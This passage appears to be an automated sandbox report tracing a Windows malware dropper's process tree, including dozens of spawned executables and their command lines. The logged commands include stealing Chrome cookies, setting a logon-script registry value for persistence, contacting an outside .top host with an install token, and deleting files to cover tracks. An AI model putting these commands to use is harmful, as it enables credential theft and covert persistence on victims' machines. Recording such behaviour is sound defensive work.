  "C:\Users\Admin\Documents\D15mnp9yV3DSru0qxTrTPLC5.exe"
  2⤵
  - Executes dropped EXE
  PID:192
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 760
    3⤵
    - Program crash
    PID:6024
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 816
    3⤵
    - Program crash
    PID:5780
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 852
    3⤵
    - Program crash
    PID:6008
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 856
    3⤵
    - Program crash
    PID:6536
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 964
    3⤵
    - Program crash
    PID:1836
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 940
    3⤵
    - Program crash
    PID:6376
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 192 -s 996
    3⤵
    - Program crash
    PID:4064
- C:\Users\Admin\Documents\4yugMo4I2yJgvw_Kg9av9OCT.exe
  "C:\Users\Admin\Documents\4yugMo4I2yJgvw_Kg9av9OCT.exe"
  2⤵
  - Executes dropped EXE
  PID:2392
- C:\Users\Admin\Documents\hqxa5Mo59Wmnvff3zAY0Aghd.exe
  "C:\Users\Admin\Documents\hqxa5Mo59Wmnvff3zAY0Aghd.exe"
  2⤵
  - Executes dropped EXE
  PID:3108
- - C:\Users\Admin\Documents\hqxa5Mo59Wmnvff3zAY0Aghd.exe
    "C:\Users\Admin\Documents\hqxa5Mo59Wmnvff3zAY0Aghd.exe" -q
    3⤵
    - Executes dropped EXE
    PID:4712
- C:\Users\Admin\Documents\DBYWgFzqSyRnTC2xtVxdSZPJ.exe
  "C:\Users\Admin\Documents\DBYWgFzqSyRnTC2xtVxdSZPJ.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:2164
- - C:\Program Files (x86)\Company\NewProduct\jooyu.exe
    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
    3⤵
    - Executes dropped EXE
    PID:4352
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      Executes dropped EXE
      PID:4248
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:4580
  - - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      PID:10096
- - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
    3⤵
    - Executes dropped EXE
    PID:4376
- - C:\Program Files (x86)\Company\NewProduct\customer3.exe
    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
    3⤵
    - Executes dropped EXE
    PID:4416
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      Executes dropped EXE
      PID:2436
  - - C:\Users\Admin\AppData\Local\Temp\11111.exe
      C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
      4⤵
      Executes dropped EXE
      PID:4332
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 4416 -s 1316
      4⤵
      Program crash
      PID:4572
- C:\Users\Admin\Documents\1QzI74oJk44h5pnSKCFUFrND.exe
  "C:\Users\Admin\Documents\1QzI74oJk44h5pnSKCFUFrND.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:1712
- C:\Users\Admin\Documents\4TS5KEf_GCWhHvczBXfd5Urj.exe
  "C:\Users\Admin\Documents\4TS5KEf_GCWhHvczBXfd5Urj.exe"
  2⤵
  - Executes dropped EXE
  PID:4292
- - C:\Users\Admin\AppData\Local\Temp\is-BV598.tmp\4TS5KEf_GCWhHvczBXfd5Urj.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-BV598.tmp\4TS5KEf_GCWhHvczBXfd5Urj.tmp" /SL5="$3019E,138429,56832,C:\Users\Admin\Documents\4TS5KEf_GCWhHvczBXfd5Urj.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    PID:4536
  - - C:\Users\Admin\AppData\Local\Temp\is-O6ODQ.tmp\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\is-O6ODQ.tmp\Setup.exe" /Verysilent
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      PID:3476
    - - C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"
        5⤵
        
        PID:2216
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 792
        6⤵
        Program crash
        
        PID:2660
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 868
        6⤵
        Program crash
        
        PID:1784
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 956
        6⤵
        Program crash
        
        PID:5112
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 1344
        6⤵
        Program crash
        
        PID:5404
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 1360
        6⤵
        Program crash
        
        PID:4180
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 1464
        6⤵
        Program crash
        
        PID:4180
    - - C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
        5⤵
        Executes dropped EXE
        
        PID:2484
      - C:\Users\Admin\AppData\Local\Temp\is-5OTOQ.tmp\Inlog.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5OTOQ.tmp\Inlog.tmp" /SL5="$102E0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:2104
        
        C:\Users\Admin\AppData\Local\Temp\is-7MNQ9.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-7MNQ9.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
        7⤵
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\is-S4I7U.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-S4I7U.tmp\Setup.tmp" /SL5="$104E2,17369384,721408,C:\Users\Admin\AppData\Local\Temp\is-7MNQ9.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
        8⤵
        
        PID:5892
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-CQ3AD.tmp\{app}\microsoft.cab -F:* %ProgramData%
        9⤵
        
        PID:5164
        
        C:\Windows\SysWOW64\expand.exe
        
        expand C:\Users\Admin\AppData\Local\Temp\is-CQ3AD.tmp\{app}\microsoft.cab -F:* C:\ProgramData
        10⤵
        
        PID:6472
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
        9⤵
        
        PID:7800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
        10⤵
        
        PID:788
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
        9⤵
        
        PID:7624
        
        C:\Users\Admin\AppData\Local\Temp\is-CQ3AD.tmp\{app}\vdi_compiler.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-CQ3AD.tmp\{app}\vdi_compiler"
        9⤵
        
        PID:2072
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-CQ3AD.tmp\{app}\vdi_compiler.exe"
        10⤵
        
        PID:8632
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 4
        11⤵
        Runs ping.exe
        
        PID:5684
        
        C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
        
        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
        9⤵
        
        PID:9148
    - - C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
        5⤵
        Executes dropped EXE
        
        PID:3240
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629273114 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
        6⤵
        
        PID:6552
    - - C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
        5⤵
        
        PID:3340
      - C:\Users\Admin\AppData\Local\Temp\is-203O2.tmp\WEATHER Manager.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-203O2.tmp\WEATHER Manager.tmp" /SL5="$102F8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
        6⤵
        
        PID:1760
        
        C:\Users\Admin\AppData\Local\Temp\is-F5RD9.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-F5RD9.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
        7⤵
        
        PID:5800
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-F5RD9.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-F5RD9.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629273115 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
        8⤵
        
        PID:7384
    - - C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
        5⤵
        Executes dropped EXE
        
        PID:1960
    - - C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
        5⤵
        Executes dropped EXE
        
        PID:2300
      - C:\Users\Admin\AppData\Local\Temp\is-8O49Q.tmp\VPN.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-8O49Q.tmp\VPN.tmp" /SL5="$102F6,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
        6⤵
        
        PID:5056
        
        C:\Users\Admin\AppData\Local\Temp\is-7R8R7.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-7R8R7.tmp\Setup.exe" /silent /subid=720
        7⤵
        
        PID:4228
        
        C:\Users\Admin\AppData\Local\Temp\is-5GQS7.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5GQS7.tmp\Setup.tmp" /SL5="$20464,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-7R8R7.tmp\Setup.exe" /silent /subid=720
        8⤵
        
        PID:2396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        9⤵
        
        PID:5508
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        10⤵
        
        PID:7336
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        9⤵
        
        PID:7648
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        10⤵
        
        PID:7296
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        9⤵
        
        PID:8452
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        9⤵
        
        PID:5720
    - - C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
        5⤵
        
        PID:3744
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:6512
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:5624
    - - C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
        5⤵
        
        PID:496
      - C:\Users\Admin\AppData\Local\Temp\is-AEK2V.tmp\MediaBurner2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-AEK2V.tmp\MediaBurner2.tmp" /SL5="$30300,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
        6⤵
        
        PID:5124
        
        C:\Users\Admin\AppData\Local\Temp\is-0BTA5.tmp\3377047_logo_media.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-0BTA5.tmp\3377047_logo_media.exe" /S /UID=burnerch2
        7⤵
        
        PID:5948
        
        C:\Program Files\Windows Mail\SWPFFCTIHD\ultramediaburner.exe
        
        "C:\Program Files\Windows Mail\SWPFFCTIHD\ultramediaburner.exe" /VERYSILENT
        8⤵
        
        PID:6804
        
        C:\Users\Admin\AppData\Local\Temp\is-B71VM.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-B71VM.tmp\ultramediaburner.tmp" /SL5="$30366,281924,62464,C:\Program Files\Windows Mail\SWPFFCTIHD\ultramediaburner.exe" /VERYSILENT
        9⤵
        
        PID:5524
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\1e-e7945-7b7-8c1a7-7264dd8a20005\Qatubucuby.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1e-e7945-7b7-8c1a7-7264dd8a20005\Qatubucuby.exe"
        8⤵
        
        PID:5488
        
        C:\Users\Admin\AppData\Local\Temp\d5-aac54-94a-212ba-58e85dbe35563\Gefomuxaele.exe
        
        "C:\Users\Admin\AppData\Local\Temp\d5-aac54-94a-212ba-58e85dbe35563\Gefomuxaele.exe"
        8⤵
        
        PID:1760
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\phurqg33.j2o\GcleanerEU.exe /eufive & exit
        9⤵
        
        PID:7252
        
        C:\Users\Admin\AppData\Local\Temp\phurqg33.j2o\GcleanerEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\phurqg33.j2o\GcleanerEU.exe /eufive
        10⤵
        
        PID:1176
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vacuo2ls.whn\installer.exe /qn CAMPAIGN="654" & exit
        9⤵
        
        PID:6748
        
        C:\Users\Admin\AppData\Local\Temp\vacuo2ls.whn\installer.exe
        
        C:\Users\Admin\AppData\Local\Temp\vacuo2ls.whn\installer.exe /qn CAMPAIGN="654"
        10⤵
        
        PID:8152
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\obnk5iyf.huf\ufgaa.exe & exit
        9⤵
        
        PID:2656
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eotnjrse.xbg\anyname.exe & exit
        9⤵
        
        PID:3852
        
        C:\Users\Admin\AppData\Local\Temp\eotnjrse.xbg\anyname.exe
        
        C:\Users\Admin\AppData\Local\Temp\eotnjrse.xbg\anyname.exe
        10⤵
        
        PID:7640
        
        C:\Users\Admin\AppData\Local\Temp\eotnjrse.xbg\anyname.exe
        
        "C:\Users\Admin\AppData\Local\Temp\eotnjrse.xbg\anyname.exe" -q
        11⤵
        
        PID:6632
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b1oac0hi.ssq\gcleaner.exe /mixfive & exit
        9⤵
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\b1oac0hi.ssq\gcleaner.exe
        
        C:\Users\Admin\AppData\Local\Temp\b1oac0hi.ssq\gcleaner.exe /mixfive
        10⤵
        
        PID:2836
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z531d2oe.ntu\autosubplayer.exe /S & exit
        9⤵
        Executes dropped EXE
        
        PID:2216
    - - C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
        5⤵
        
        PID:3352
      - C:\Users\Admin\AppData\Roaming\2510032.exe
        
        "C:\Users\Admin\AppData\Roaming\2510032.exe"
        6⤵
        
        PID:5300
      - C:\Users\Admin\AppData\Roaming\8843517.exe
        
        "C:\Users\Admin\AppData\Roaming\8843517.exe"
        6⤵
        
        PID:5452
      - C:\Users\Admin\AppData\Roaming\3827320.exe
        
        "C:\Users\Admin\AppData\Roaming\3827320.exe"
        6⤵
        
        PID:5552
      - C:\Users\Admin\AppData\Roaming\7229834.exe
        
        "C:\Users\Admin\AppData\Roaming\7229834.exe"
        6⤵
        
        PID:5620
    - - C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
        5⤵
        
        PID:4864
      - C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
        6⤵
        
        PID:5828
    - - C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
        5⤵
        
        PID:5088
      - C:\Users\Admin\Documents\nFBAW3tSjRWLs8N0Mt4__dRM.exe
        
        "C:\Users\Admin\Documents\nFBAW3tSjRWLs8N0Mt4__dRM.exe"
        6⤵
        
        PID:4296
        
        C:\Users\Admin\Documents\nFBAW3tSjRWLs8N0Mt4__dRM.exe
        
        C:\Users\Admin\Documents\nFBAW3tSjRWLs8N0Mt4__dRM.exe
        7⤵
        
        PID:4796
      - C:\Users\Admin\Documents\9DMEsggkl8MTL2huvJ6Euy07.exe
        
        "C:\Users\Admin\Documents\9DMEsggkl8MTL2huvJ6Euy07.exe"
        6⤵
        
        PID:4540
      - C:\Users\Admin\Documents\Liztm33t8Q5Qf3Wz7LmWdax3.exe
        
        "C:\Users\Admin\Documents\Liztm33t8Q5Qf3Wz7LmWdax3.exe"
        6⤵
        
        PID:4724
        
        C:\Users\Admin\AppData\Roaming\7088794.exe
        
        "C:\Users\Admin\AppData\Roaming\7088794.exe"
        7⤵
        
        PID:7164
        
        C:\Users\Admin\AppData\Roaming\8319135.exe
        
        "C:\Users\Admin\AppData\Roaming\8319135.exe"
        7⤵
        
        PID:3132
      - C:\Users\Admin\Documents\NBDyHGx3z1ZBLUAXnk2ebshQ.exe
        
        "C:\Users\Admin\Documents\NBDyHGx3z1ZBLUAXnk2ebshQ.exe"
        6⤵
        
        PID:3352
      - C:\Users\Admin\Documents\4Nrk5l3r9sSyn6xD9rvcMUrx.exe
        
        "C:\Users\Admin\Documents\4Nrk5l3r9sSyn6xD9rvcMUrx.exe"
        6⤵
        
        PID:6148
        
        C:\Users\Admin\Documents\4Nrk5l3r9sSyn6xD9rvcMUrx.exe
        
        C:\Users\Admin\Documents\4Nrk5l3r9sSyn6xD9rvcMUrx.exe
        7⤵
        
        PID:2660
        
        C:\Users\Admin\Documents\4Nrk5l3r9sSyn6xD9rvcMUrx.exe
        
        C:\Users\Admin\Documents\4Nrk5l3r9sSyn6xD9rvcMUrx.exe
        7⤵
        
        PID:1924
      - C:\Users\Admin\Documents\Lx_yrGHtmPYaqhORiUUaWKRV.exe
        
        "C:\Users\Admin\Documents\Lx_yrGHtmPYaqhORiUUaWKRV.exe"
        6⤵
        
        PID:4804
      - C:\Users\Admin\Documents\BJqagyxIDgj_BtcfoZLXNv4M.exe
        
        "C:\Users\Admin\Documents\BJqagyxIDgj_BtcfoZLXNv4M.exe"
        6⤵
        
        PID:4512
      - C:\Users\Admin\Documents\8gmbbDgpss1qbuuIAs5pF8Iq.exe
        
        "C:\Users\Admin\Documents\8gmbbDgpss1qbuuIAs5pF8Iq.exe"
        6⤵
        
        PID:4824
        
        C:\Users\Admin\Documents\8gmbbDgpss1qbuuIAs5pF8Iq.exe
        
        "C:\Users\Admin\Documents\8gmbbDgpss1qbuuIAs5pF8Iq.exe"
        7⤵
        
        PID:9968
      - C:\Users\Admin\Documents\tLNZW1GcrpNnF3B83LiqTdtp.exe
        
        "C:\Users\Admin\Documents\tLNZW1GcrpNnF3B83LiqTdtp.exe"
        6⤵
        
        PID:4744
        
        C:\Users\Admin\Documents\tLNZW1GcrpNnF3B83LiqTdtp.exe
        
        C:\Users\Admin\Documents\tLNZW1GcrpNnF3B83LiqTdtp.exe
        7⤵
        
        PID:6808
      - C:\Users\Admin\Documents\nwGeIPBAQdLcWt67CG9rbarT.exe
        
        "C:\Users\Admin\Documents\nwGeIPBAQdLcWt67CG9rbarT.exe"
        6⤵
        
        PID:6732
      - C:\Users\Admin\Documents\q9badR7Ps0ya2QFLYouM_39T.exe
        
        "C:\Users\Admin\Documents\q9badR7Ps0ya2QFLYouM_39T.exe"
        6⤵
        
        PID:6784
        
        C:\Users\Admin\AppData\Local\Temp\is-B7N9I.tmp\q9badR7Ps0ya2QFLYouM_39T.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-B7N9I.tmp\q9badR7Ps0ya2QFLYouM_39T.tmp" /SL5="$7010E,138429,56832,C:\Users\Admin\Documents\q9badR7Ps0ya2QFLYouM_39T.exe"
        7⤵
        
        PID:7156
        
        C:\Users\Admin\AppData\Local\Temp\is-S0OG8.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-S0OG8.tmp\Setup.exe" /Verysilent
        8⤵
        
        PID:6700
        
        C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
        9⤵
        
        PID:6780
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629273115 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
        10⤵
        
        PID:8472
      - C:\Users\Admin\Documents\mepdAk3OZkF97VMiCyKFfcBj.exe
        
        "C:\Users\Admin\Documents\mepdAk3OZkF97VMiCyKFfcBj.exe"
        6⤵
        
        PID:6876
      - C:\Users\Admin\Documents\LcnqHiXOYcHB_CdivX5Or_rU.exe
        
        "C:\Users\Admin\Documents\LcnqHiXOYcHB_CdivX5Or_rU.exe"
        6⤵
        
        PID:6612
      - C:\Users\Admin\Documents\XJRT9CME3AEWgf0B3CtQSRs5.exe
        
        "C:\Users\Admin\Documents\XJRT9CME3AEWgf0B3CtQSRs5.exe"
        6⤵
        
        PID:6604
      - C:\Users\Admin\Documents\OYyz1M6bnpnDeCLMR7qNJUcO.exe
        
        "C:\Users\Admin\Documents\OYyz1M6bnpnDeCLMR7qNJUcO.exe"
        6⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 760
        7⤵
        Program crash
        
        PID:7660
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 812
        7⤵
        Program crash
        
        PID:7852
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 816
        7⤵
        Program crash
        
        PID:8080
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 824
        7⤵
        Program crash
        
        PID:7300
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 868
        7⤵
        Program crash
        
        PID:7524
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1100
        7⤵
        Program crash
        
        PID:6100
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1116
        7⤵
        Program crash
        
        PID:7932
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1408
        7⤵
        Program crash
        
        PID:6276
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1396
        7⤵
        Program crash
        
        PID:8144
      - C:\Users\Admin\Documents\vuknjgI9yxbnXNQcxSUwHaiV.exe
        
        "C:\Users\Admin\Documents\vuknjgI9yxbnXNQcxSUwHaiV.exe"
        6⤵
        
        PID:6508
      - C:\Users\Admin\Documents\OqvuInXq4AUg4mm4fRIR7jTs.exe
        
        "C:\Users\Admin\Documents\OqvuInXq4AUg4mm4fRIR7jTs.exe"
        6⤵
        
        PID:6492
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 664
        7⤵
        Program crash
        
        PID:5572
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 632
        7⤵
        Program crash
        
        PID:4760
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 752
        7⤵
        Program crash
        
        PID:3744
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 1124
        7⤵
        Program crash
        
        PID:5128
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 1156
        7⤵
        Program crash
        
        PID:2656
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6492 -s 1172
        7⤵
        Program crash
        
        PID:6244
      - C:\Users\Admin\Documents\hxn57bXtgtUxcJHa58cujkXu.exe
        
        "C:\Users\Admin\Documents\hxn57bXtgtUxcJHa58cujkXu.exe"
        6⤵
        
        PID:6500
